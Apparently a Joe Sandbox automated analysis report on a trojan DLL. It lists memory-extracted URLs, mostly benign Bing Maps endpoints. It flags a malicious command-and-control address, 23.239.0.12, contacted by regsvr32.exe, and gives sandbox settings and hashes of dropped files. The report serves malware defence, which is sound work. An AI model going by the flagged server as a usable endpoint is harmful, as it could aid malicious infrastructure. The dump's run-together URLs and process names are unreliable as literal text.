                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000003.330825032.000001430AC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330844563.000001430AC41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331297688.000001430AC42000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.hotspotshield.com/terms/svchost.exe, 00000022.00000003.603804588.000001C02EE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603777831.000001C02EE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603863331.000001C02E99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603876739.000001C02E9AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603935483.000001C02E981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.604008451.000001C02EE19000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://www.pango.co/privacysvchost.exe, 00000022.00000003.603804588.000001C02EE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603777831.000001C02EE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603863331.000001C02E99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603876739.000001C02E9AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603935483.000001C02E981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.604008451.000001C02EE19000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.331180065.000001430AC13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000022.00000003.607654465.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607561946.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607667402.000001C02E9A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.330825032.000001430AC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330839063.000001430AC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000B.00000003.330635732.000001430AC68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331336940.000001430AC6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.ver)svchost.exe, 0000000E.00000002.672639318.000001CDC40D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.630957740.000001C02E0E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000003.330825032.000001430AC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331324173.000001430AC5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000022.00000003.612211352.000001C02E9B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.612250990.000001C02E99C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.612239431.000001C02E9B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.612292728.000001C02E981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.612315449.000001C02EE02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.331180065.000001430AC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://23.239.0.12/&regsvr32.exe, 00000007.00000002.807577949.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368846943.0000000000BA2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://%s.xboxlive.comsvchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  low
                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000002.331180065.000001430AC13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.hotspotshield.com/svchost.exe, 00000022.00000003.603804588.000001C02EE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603777831.000001C02EE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603863331.000001C02E99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603876739.000001C02E9AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603935483.000001C02E981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.604008451.000001C02EE19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2svchost.exe, 0000000E.00000003.671968132.000001CDC40BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.672618537.000001CDC40BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000002.331324173.000001430AC5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000022.00000003.607654465.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607561946.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607667402.000001C02E9A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331303065.000001430AC4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://dynamic.tsvchost.exe, 0000000B.00000003.330667118.000001430AC4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330844563.000001430AC41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331297688.000001430AC42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://disneyplus.com/legal.svchost.exe, 00000022.00000003.607654465.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607561946.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607667402.000001C02E9A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000002.331285339.000001430AC39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.331324173.000001430AC5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://activity.windows.comsvchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://help.disneyplus.com.svchost.exe, 00000022.00000003.607654465.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607561946.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607667402.000001C02E9A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            low
                                                                                            https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331303065.000001430AC4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                23.239.0.12
                                                                                                unknownUnited States
                                                                                                63949LINODE-APLinodeLLCUStrue
                                                                                                IP
                                                                                                127.0.0.1
                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                Analysis ID:626501
                                                                                                Start date and time: 14/05/202205:08:082022-05-14 05:08:08 +02:00
                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                Overall analysis duration:0h 10m 37s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:light
                                                                                                Sample file name:1Klocu2k7B (renamed file extension from none to dll)
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                Number of analysed new started processes analysed:38
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • HDC enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Detection:MAL
                                                                                                Classification:mal84.troj.evad.winDLL@29/10@0/2
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HDC Information:Failed
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 99%
                                                                                                • Number of executed functions: 0
                                                                                                • Number of non-executed functions: 0
                                                                                                Cookbook Comments:
                                                                                                • Adjust boot time
                                                                                                • Enable AMSI
                                                                                                • Override analysis time to 240s for rundll32
                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, UsoClient.exe, wuapihost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 52.168.117.173, 23.211.4.86, 51.104.136.2, 51.11.168.232, 20.223.24.244
                                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, settings-prod-neu-2.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, settings-prod-uks-1.uksouth.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, atm-settingsfe-prod-geo.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                TimeTypeDescription
                                                                                                05:09:47API Interceptor12x Sleep call for process: svchost.exe modified
                                                                                                05:09:49API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                05:10:50API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                No context
                                                                                                No context
                                                                                                No context
                                                                                                No context
                                                                                                No context
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8192
                                                                                                Entropy (8bit):0.3593198815979092
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                Malicious:false
                                                                                                Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:MPEG-4 LOAS
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.24938786411257738
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4h:BJiRdwfu2SRU4h
                                                                                                MD5:C3814F49FFF59FC44233DEE0E32DC2A4
                                                                                                SHA1:844318D5BDD811FA1F03D5EC9F6060C9262B5146
                                                                                                SHA-256:CC3DE83EF2A12A5D662FD10B305C32363E77D306B8789BD6C302C8D95EC4086F
                                                                                                SHA-512:249521B52011A099573FA32E98157FDA43ECCD1DD5BC4DD695C09D87C992C6E3930E6BB0CC5110C2A734E39802797FA4DDBB1837D1C6AF0025762973ACF48700
                                                                                                Malicious:false
                                                                                                Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7970229a, page size 16384, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):786432
                                                                                                Entropy (8bit):0.2505356531914351
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:Cfj+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:CfQSB2nSB2RSjlK/+mLesOj1J2
                                                                                                MD5:1446D755965D43FF5F78EF7FF176FC76
                                                                                                SHA1:BE76AD884B6A104D77963CB42D65563543D087FB
                                                                                                SHA-256:32996A0BFFE0847FD40FB671B63BD77BA988E6BA6BAECD5A8BD99CF572A4403D
                                                                                                SHA-512:DA951E88EDBBCB7A7A7C59D4617236A1A211D09F49C78BB10949F4AE28941B3C454735A5AE96AD54630BE140BF757D8635284664D321DD164D86403E685EBFE5
                                                                                                Malicious:false
                                                                                                Preview:yp".... ................e.f.3...w........................).....:....z..0....z5.h.(.....:....z....)..............3...w...........................................................................................................B...........@...................................................................................................... .......................................................................................................................................................................................................................................................:....z...................^.C:....z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16384
                                                                                                Entropy (8bit):0.07222303629557764
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:UlllR7vVfQlDPt+gFDmE6/7fU6tall3Vkttlmlnl:Ul/RrBgsKDL6/b83
                                                                                                MD5:3B09EC4A6758028EB7A991F11FDD8F33
                                                                                                SHA1:D056FB5DD1D9402736C6A90F64E52667A07F0A48
                                                                                                SHA-256:77E6A0E693AD4D84E57EEBE611CB8689D17DA0975343399D755F8F1FCC5FD506
                                                                                                SHA-512:6E411CF10EF955CCB04D77F3228C6AC10E331C9DFF56B9F8B13214EFFA6192A9A11990260325AD4474C3A1CB6768A987C9817D5F257C388E7E9C2A9D20FA89A4
                                                                                                Malicious:false
                                                                                                Preview:.z.......................................3...w..0....z5.:....z..........:....z..:....z....C9....z.{.................^.C:....z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):65536
                                                                                                Entropy (8bit):0.7845729678688526
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:mHwiIJKvBHK7gPri4jI9/u7s1S274ltC:WwiWKvRK7gPri4jy/u7s1X4ltC
                                                                                                MD5:05DFB045B28F78ECB4EDC70B3AE24BB1
                                                                                                SHA1:94C344CEAA6A279DCD0A14986FC8F91C1787467E
                                                                                                SHA-256:F42BB2C634A9DA42CB533E4392AEB2E23013F7AF5F747EFBAB602070A3C2804D
                                                                                                SHA-512:0760C6CC220D87B8675A163D8C926021B6EDDB5466CE0D13ADBC0358D1379EC9BAFC094CFC3E14CE43896F0FCA4592E441FB78DF666791633CC42510799CC3B6
                                                                                                Malicious:false
                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.0.0.3.7.8.0.1.4.2.6.3.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.0.0.3.7.8.7.5.4.8.8.2.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.f.1.7.1.6.7.-.e.1.5.f.-.4.f.e.3.-.b.8.0.e.-.a.d.8.0.1.4.b.e.d.d.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.b.2.9.9.4.2.-.3.d.7.4.-.4.4.f.c.-.8.a.6.3.-.3.1.3.1.d.7.7.3.3.b.8.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.1.K.l.o.c.u.2.k.7.B...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.e.0.-.0.0.0.1.-.0.0.1.d.-.7.4.2.4.-.5.4.7.8.8.b.6.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.
                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                File Type:Mini DuMP crash report, 15 streams, Sat May 14 12:09:41 2022, 0x1205a4 type
                                                                                                Category:dropped
                                                                                                Size (bytes):76090
                                                                                                Entropy (8bit):2.0780623988992426
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:mjDgvroVTQCEdOJ+IMyq7QEVz8CLKuSliWfreh1rMpQ:2BxQCEd3xyeNVLLjS
                                                                                                MD5:98BF40162011B50D6FF62CB2DBB6A04B
                                                                                                SHA1:47236A1E1A3F83DEA7781C301184DD8A6AC3FA30
                                                                                                SHA-256:411A63B5A408E1988E7CA3D686BF4BD15CDB5B3FBB7158F1014B5A8D7EC0C743
                                                                                                SHA-512:080F9AA5DFECF3F11C7481860863F3953FBE7439B77F14343D70726BA7C3C6055C07E9A539CB95C0661921237EEF38B822A053CD25D37230616601C748BD90E6
                                                                                                Malicious:false
                                                                                                Preview:MDMP....... ..........b....................................|...h...........L@..........`.......8...........T...............Z............"...........$...................................................................U...........B......h%......Lw................iQ....T..............b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8668
                                                                                                Entropy (8bit):3.695682396950272
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Rrl7r3GLNivu2JHnDL6YPMdCgCgmfRaiS09Cpr189b6oCf/em:RrlsNi2uHnDL6YUdCngmfRaiS0H6dff
                                                                                                MD5:8C3200AB3325AE8B504193C6C8E21CEC
                                                                                                SHA1:10ADE9F2CAB393FC863B415029ABBBC31E6CDCB9
                                                                                                SHA-256:B2562E51D8A448B696C30ED9D69A396924D6F55724010E6D7A3C15174034A205
                                                                                                SHA-512:52D99F68571FEC24F6653ABCDCDCF54B9032E89CB2A8A9DCB2980C05B09291B17EB46A214FC8B627CCC5BA75FCC587ADE26D86A5E25EBDA859220D8944C3A906
                                                                                                Malicious:false
                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.9.2.<./.P.i.d.>.........
                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):4892
                                                                                                Entropy (8bit):4.499916095596451
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:cvIwSD8zs0JgtBI9GwWgc8sqYj88fm8M4JCeCRanF8yq8vhRaMo0ZESC5Sld:uITfy4JgrsqY9JwWxFVvld
                                                                                                MD5:14DC29181342110D948138D2326A57C2
                                                                                                SHA1:75E559A7756D6C7CD685BE48D99240103845B753
                                                                                                SHA-256:3A0B23CA877F8BB6D3FB1CFC10E6761C0855FA1368712CB478871E921F3958F2
                                                                                                SHA-512:D1A41DA49AE57EA4A13CDD0A9DFF281F25113F9B78F3189FC3DD300592F04A1792927A397F13A6A1B64712A02B0CE10C158DE807CB76759E5613270D12D71771
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1514720" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):55
                                                                                                Entropy (8bit):4.306461250274409
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                Malicious:false
                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):9062
                                                                                                Entropy (8bit):3.1628588159794235
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zH+8:j+s+v+b+P+m+0+Q+q+w+8
                                                                                                MD5:E29E1B1DC02CBB21E227341F3771337B
